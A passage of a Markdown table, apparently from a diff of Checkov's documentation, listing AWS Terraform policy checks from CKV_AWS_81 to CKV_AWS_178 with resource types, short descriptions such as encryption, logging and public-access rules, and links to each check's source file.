CKV_AWS_81 | resource | aws_msk_cluster | Ensure MSK Cluster encryption in rest and transit is enabled | Terraform | [MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterEncryption.py) | +| 157 | CKV_AWS_82 | resource | aws_athena_workgroup | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption | Terraform | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupConfiguration.py) | +| 158 | CKV_AWS_83 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain enforces HTTPS | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | +| 159 | CKV_AWS_83 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain enforces HTTPS | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | +| 160 | CKV_AWS_84 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain Logging is enabled | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py) | +| 161 | CKV_AWS_84 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain Logging is enabled | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py) | +| 162 | CKV_AWS_85 | resource | aws_docdb_cluster | Ensure DocumentDB Logging is enabled | Terraform | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBLogging.py) | +| 163 | CKV_AWS_86 | resource | aws_cloudfront_distribution | Ensure CloudFront 
distribution has Access Logging enabled | Terraform | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionLogging.py) | +| 164 | CKV_AWS_87 | resource | aws_redshift_cluster | Redshift cluster should not be publicly accessible | Terraform | [RedshitClusterPubliclyAvailable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshitClusterPubliclyAvailable.py) | +| 165 | CKV_AWS_88 | resource | aws_instance | EC2 instance should not have public IP. | Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py) | +| 166 | CKV_AWS_88 | resource | aws_launch_template | EC2 instance should not have public IP. | Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py) | +| 167 | CKV_AWS_89 | resource | aws_dms_replication_instance | DMS replication instance should not be publicly accessible | Terraform | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py) | +| 168 | CKV_AWS_90 | resource | aws_docdb_cluster_parameter_group | Ensure DocumentDB TLS is not disabled | Terraform | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBTLS.py) | +| 169 | CKV_AWS_91 | resource | aws_alb | Ensure the ELBv2 (Application/Network) has access logging enabled | Terraform | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py) | +| 170 | CKV_AWS_91 | resource | aws_lb | Ensure the ELBv2 (Application/Network) has access logging enabled | Terraform | 
[ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py) | +| 171 | CKV_AWS_92 | resource | aws_elb | Ensure the ELB has access logging enabled | Terraform | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBAccessLogs.py) | +| 172 | CKV_AWS_93 | resource | aws_s3_bucket | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes) | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py) | +| 173 | CKV_AWS_93 | resource | aws_s3_bucket_policy | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes) | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py) | +| 174 | CKV_AWS_94 | resource | aws_glue_data_catalog_encryption_settings | Ensure Glue Data Catalog Encryption is enabled | Terraform | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueDataCatalogEncryption.py) | +| 175 | CKV_AWS_96 | resource | aws_rds_cluster | Ensure all data stored in Aurora is securely encrypted at rest | Terraform | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AuroraEncryption.py) | +| 176 | CKV_AWS_97 | resource | aws_ecs_task_definition | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions | Terraform | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py) | +| 177 | CKV_AWS_98 | resource | aws_sagemaker_endpoint_configuration | Ensure all data stored in the 
Sagemaker Endpoint is securely encrypted at rest | Terraform | [SagemakerEndpointConfigurationEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerEndpointConfigurationEncryption.py) | +| 178 | CKV_AWS_99 | resource | aws_glue_security_configuration | Ensure Glue Security Configuration Encryption is enabled | Terraform | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfiguration.py) | +| 179 | CKV_AWS_100 | resource | aws_eks_node_group | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0 | Terraform | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSNodeGroupRemoteAccess.py) | +| 180 | CKV_AWS_101 | resource | aws_neptune_cluster | Ensure Neptune logging is enabled | Terraform | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterLogging.py) | +| 181 | CKV_AWS_102 | resource | aws_neptune_cluster_instance | Ensure Neptune Cluster instance is not publicly available | Terraform | [NeptuneClusterInstancePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterInstancePublic.py) | +| 182 | CKV_AWS_103 | resource | aws_alb_listener | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | +| 183 | CKV_AWS_103 | resource | aws_lb | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | +| 184 | CKV_AWS_103 | resource | aws_lb_listener | Ensure that load balancer is using at least TLS 1.2 | 
Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | +| 185 | CKV_AWS_104 | resource | aws_docdb_cluster_parameter_group | Ensure DocumentDB has audit logs enabled | Terraform | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBAuditLogs.py) | +| 186 | CKV_AWS_105 | resource | aws_redshift_parameter_group | Ensure Redshift uses SSL | Terraform | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedShiftSSL.py) | +| 187 | CKV_AWS_106 | resource | aws_ebs_encryption_by_default | Ensure EBS default encryption is enabled | Terraform | [EBSDefaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSDefaultEncryption.py) | +| 188 | CKV_AWS_107 | data | aws_iam_policy_document | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py) | +| 189 | CKV_AWS_108 | data | aws_iam_policy_document | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMDataExfiltration.py) | +| 190 | CKV_AWS_109 | data | aws_iam_policy_document | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py) | +| 191 | CKV_AWS_110 | data | aws_iam_policy_document | Ensure IAM policies does not allow privilege escalation | Terraform | 
[IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPrivilegeEscalation.py) | +| 192 | CKV_AWS_111 | data | aws_iam_policy_document | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMWriteAccess.py) | +| 193 | CKV_AWS_112 | resource | aws_ssm_document | Ensure Session Manager data is encrypted in transit | Terraform | [SSMSessionManagerDocumentEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentEncryption.py) | +| 194 | CKV_AWS_113 | resource | aws_ssm_document | Ensure Session Manager logs are enabled and encrypted | Terraform | [SSMSessionManagerDocumentLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentLogging.py) | +| 195 | CKV_AWS_114 | resource | aws_emr_cluster | Ensure that EMR clusters with Kerberos have Kerberos Realm set | Terraform | [EMRClusterKerberosAttributes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterKerberosAttributes.py) | +| 196 | CKV_AWS_115 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Terraform | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) | +| 197 | CKV_AWS_116 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Terraform | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaDLQConfigured.py) | +| 198 | CKV_AWS_117 | resource | aws_lambda_function | Ensure that AWS Lambda function is 
configured inside a VPC | Terraform | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaInVPC.py) | +| 199 | CKV_AWS_118 | resource | aws_db_instance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Terraform | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py) | +| 200 | CKV_AWS_118 | resource | aws_rds_cluster_instance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Terraform | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py) | +| 201 | CKV_AWS_119 | resource | aws_dynamodb_table | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK | Terraform | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTablesEncrypted.py) | +| 202 | CKV_AWS_120 | resource | aws_api_gateway_stage | Ensure API Gateway caching is enabled | Terraform | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCacheEnable.py) | +| 203 | CKV_AWS_121 | resource | aws_config_configuration_aggregator | Ensure AWS Config is enabled in all regions | Terraform | [ConfigConfgurationAggregatorAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConfigConfgurationAggregatorAllRegions.py) | +| 204 | CKV_AWS_122 | resource | aws_sagemaker_notebook_instance | Ensure that direct internet access is disabled for an Amazon SageMaker Notebook Instance | Terraform | [SageMakerInternetAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SageMakerInternetAccessDisabled.py) | +| 205 | CKV_AWS_123 | resource | aws_vpc_endpoint_service | Ensure that VPC 
Endpoint Service is configured for Manual Acceptance | Terraform | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCEndpointAcceptanceConfigured.py) | +| 206 | CKV_AWS_124 | resource | aws_cloudformation_stack | Ensure that CloudFormation stacks are sending event notifications to an SNS topic | Terraform | [CloudformationStackNotificationArns.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudformationStackNotificationArns.py) | +| 207 | CKV_AWS_126 | resource | aws_instance | Ensure that detailed monitoring is enabled for EC2 instances | Terraform | [EC2DetailedMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2DetailedMonitoringEnabled.py) | +| 208 | CKV_AWS_127 | resource | aws_elb | Ensure that Elastic Load Balancer(s) uses SSL certificates provided by AWS Certificate Manager | Terraform | [ELBUsesSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBUsesSSL.py) | +| 209 | CKV_AWS_129 | resource | aws_db_instance | Ensure that respective logs of Amazon Relational Database Service (Amazon RDS) are enabled | Terraform | [DBInstanceLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceLogging.py) | +| 210 | CKV_AWS_130 | resource | aws_subnet | Ensure VPC subnets do not assign public IP by default | Terraform | [SubnetPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SubnetPublicIP.py) | +| 211 | CKV_AWS_131 | resource | aws_alb | Ensure that ALB drops HTTP headers | Terraform | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py) | +| 212 | CKV_AWS_131 | resource | aws_lb | Ensure that ALB drops HTTP headers | Terraform | 
[ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py) | +| 213 | CKV_AWS_133 | resource | aws_db_instance | Ensure that RDS instances has backup policy | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py) | +| 214 | CKV_AWS_133 | resource | aws_rds_cluster | Ensure that RDS instances has backup policy | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py) | +| 215 | CKV_AWS_134 | resource | aws_elasticache_cluster | Ensure that Amazon ElastiCache Redis clusters have automatic backup turned on | Terraform | [ElasticCacheAutomaticBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticBackup.py) | +| 216 | CKV_AWS_135 | resource | aws_instance | Ensure that EC2 is EBS optimized | Terraform | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2EBSOptimized.py) | +| 217 | CKV_AWS_136 | resource | aws_ecr_repository | Ensure that ECR repositories are encrypted using KMS | Terraform | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRRepositoryEncrypted.py) | +| 218 | CKV_AWS_137 | resource | aws_elasticsearch_domain | Ensure that Elasticsearch is configured inside a VPC | Terraform | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py) | +| 219 | CKV_AWS_137 | resource | aws_opensearch_domain | Ensure that Elasticsearch is configured inside a VPC | Terraform | 
[ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py) | +| 220 | CKV_AWS_138 | resource | aws_elb | Ensure that ELB is cross-zone-load-balancing enabled | Terraform | [ELBCrossZoneEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBCrossZoneEnable.py) | +| 221 | CKV_AWS_139 | resource | aws_rds_cluster | Ensure that RDS clusters have deletion protection enabled | Terraform | [RDSDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSDeletionProtection.py) | +| 222 | CKV_AWS_140 | resource | aws_rds_global_cluster | Ensure that RDS global clusters are encrypted | Terraform | [RDSClusterEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncrypted.py) | +| 223 | CKV_AWS_141 | resource | aws_redshift_cluster | Ensured that Redshift cluster allowing version upgrade by default | Terraform | [RedshiftClusterAllowVersionUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAllowVersionUpgrade.py) | +| 224 | CKV_AWS_142 | resource | aws_redshift_cluster | Ensure that Redshift cluster is encrypted by KMS | Terraform | [RedshiftClusterKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterKMSKey.py) | +| 225 | CKV_AWS_143 | resource | aws_s3_bucket | Ensure that S3 bucket has lock configuration enabled by default | Terraform | [S3BucketObjectLock.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py) | +| 226 | CKV_AWS_144 | resource | aws_s3_bucket | Ensure that S3 bucket has cross-region replication enabled | Terraform | 
[S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml) | +| 227 | CKV_AWS_144 | resource | aws_s3_bucket_replication_configuration | Ensure that S3 bucket has cross-region replication enabled | Terraform | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml) | +| 228 | CKV_AWS_145 | resource | aws_s3_bucket | Ensure that S3 buckets are encrypted with KMS by default | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml) | +| 229 | CKV_AWS_145 | resource | aws_s3_bucket_server_side_encryption_configuration | Ensure that S3 buckets are encrypted with KMS by default | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml) | +| 230 | CKV_AWS_146 | resource | aws_db_cluster_snapshot | Ensure that RDS database cluster snapshot is encrypted | Terraform | [RDSClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterSnapshotEncrypted.py) | +| 231 | CKV_AWS_147 | resource | aws_codebuild_project | Ensure that CodeBuild projects are encrypted using CMK | Terraform | [CodebuildUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildUsesCMK.py) | +| 232 | CKV_AWS_148 | resource | aws_default_vpc | Ensure no default VPC is planned to be provisioned | Terraform | [VPCDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCDefaultNetwork.py) | +| 233 | CKV_AWS_149 | resource | aws_secretsmanager_secret | Ensure that Secrets Manager secret is encrypted using KMS 
CMK | Terraform | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecretEncrypted.py) | +| 234 | CKV_AWS_150 | resource | aws_alb | Ensure that Load Balancer has deletion protection enabled | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py) | +| 235 | CKV_AWS_150 | resource | aws_lb | Ensure that Load Balancer has deletion protection enabled | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py) | +| 236 | CKV_AWS_152 | resource | aws_alb | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py) | +| 237 | CKV_AWS_152 | resource | aws_lb | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py) | +| 238 | CKV_AWS_153 | resource | aws_autoscaling_group | Autoscaling groups should supply tags to launch configurations | Terraform | [AutoScalingTagging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingTagging.py) | +| 239 | CKV_AWS_154 | resource | aws_redshift_cluster | Ensure Redshift is not deployed outside of a VPC | Terraform | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftInEc2ClassicMode.py) | +| 240 | CKV_AWS_155 | resource | aws_workspaces_workspace | Ensure that Workspace user volumes are encrypted | Terraform | 
[WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceUserVolumeEncrypted.py) | +| 241 | CKV_AWS_156 | resource | aws_workspaces_workspace | Ensure that Workspace root volumes are encrypted | Terraform | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceRootVolumeEncrypted.py) | +| 242 | CKV_AWS_157 | resource | aws_db_instance | Ensure that RDS instances have Multi-AZ enabled | Terraform | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSMultiAZEnabled.py) | +| 243 | CKV_AWS_158 | resource | aws_cloudwatch_log_group | Ensure that CloudWatch Log Group is encrypted by KMS | Terraform | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupKMSKey.py) | +| 244 | CKV_AWS_159 | resource | aws_athena_workgroup | Ensure that Athena Workgroup is encrypted | Terraform | [AthenaWorkgroupEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupEncryption.py) | +| 245 | CKV_AWS_160 | resource | aws_timestreamwrite_database | Ensure that Timestream database is encrypted with KMS CMK | Terraform | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TimestreamDatabaseKMSKey.py) | +| 246 | CKV_AWS_161 | resource | aws_db_instance | Ensure RDS database has IAM authentication enabled | Terraform | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSIAMAuthentication.py) | +| 247 | CKV_AWS_162 | resource | aws_rds_cluster | Ensure RDS cluster has IAM authentication enabled | Terraform | 
[RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterIAMAuthentication.py) | +| 248 | CKV_AWS_163 | resource | aws_ecr_repository | Ensure ECR image scanning on push is enabled | Terraform | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImageScanning.py) | +| 249 | CKV_AWS_164 | resource | aws_transfer_server | Ensure Transfer Server is not exposed publicly. | Terraform | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerIsPublic.py) | +| 250 | CKV_AWS_165 | resource | aws_dynamodb_global_table | Ensure DynamoDB point in time recovery (backup) is enabled for global tables | Terraform | [DynamoDBGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBGlobalTableRecovery.py) | +| 251 | CKV_AWS_166 | resource | aws_backup_vault | Ensure Backup Vault is encrypted at rest using KMS CMK | Terraform | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BackupVaultEncrypted.py) | +| 252 | CKV_AWS_167 | resource | aws_glacier_vault | Ensure Glacier Vault access policy is not public by only allowing specific services or principals to access it | Terraform | [GlacierVaultAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlacierVaultAnyPrincipal.py) | +| 253 | CKV_AWS_168 | resource | aws_sqs_queue | Ensure SQS queue policy is not public by only allowing specific services or principals to access it | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py) | +| 254 | CKV_AWS_168 | resource | aws_sqs_queue_policy | Ensure SQS queue policy is not public by only allowing 
specific services or principals to access it | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py) | +| 255 | CKV_AWS_169 | resource | aws_sns_topic_policy | Ensure SNS topic policy is not public by only allowing specific services or principals to access it | Terraform | [SNSTopicPolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicPolicyAnyPrincipal.py) | +| 256 | CKV_AWS_170 | resource | aws_qldb_ledger | Ensure QLDB ledger permissions mode is set to STANDARD | Terraform | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerPermissionsMode.py) | +| 257 | CKV_AWS_171 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encryption is using SSE-KMS | Terraform | [EMRClusterIsEncryptedKMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterIsEncryptedKMS.py) | +| 258 | CKV_AWS_172 | resource | aws_qldb_ledger | Ensure QLDB ledger has deletion protection enabled | Terraform | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerDeletionProtection.py) | +| 259 | CKV_AWS_173 | resource | aws_lambda_function | Check encryption settings for Lambda environmental variable | Terraform | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | +| 260 | CKV_AWS_174 | resource | aws_cloudfront_distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Terraform | [CloudfrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontTLS12.py) | +| 261 | CKV_AWS_175 | resource | 
aws_waf_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | +| 262 | CKV_AWS_175 | resource | aws_wafregional_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | +| 263 | CKV_AWS_175 | resource | aws_wafv2_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | +| 264 | CKV_AWS_176 | resource | aws_waf_web_acl | Ensure Logging is enabled for WAF Web Access Control Lists | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py) | +| 265 | CKV_AWS_176 | resource | aws_wafregional_web_acl | Ensure Logging is enabled for WAF Web Access Control Lists | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py) | +| 266 | CKV_AWS_177 | resource | aws_kinesis_video_stream | Ensure Kinesis Video Stream is encrypted by KMS using a customer managed Key (CMK) | Terraform | [KinesisVideoEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisVideoEncryptedWithCMK.py) | +| 267 | CKV_AWS_178 | resource | aws_fsx_ontap_file_system | Ensure fx ontap file system is encrypted by KMS using a customer managed Key (CMK) | Terraform | 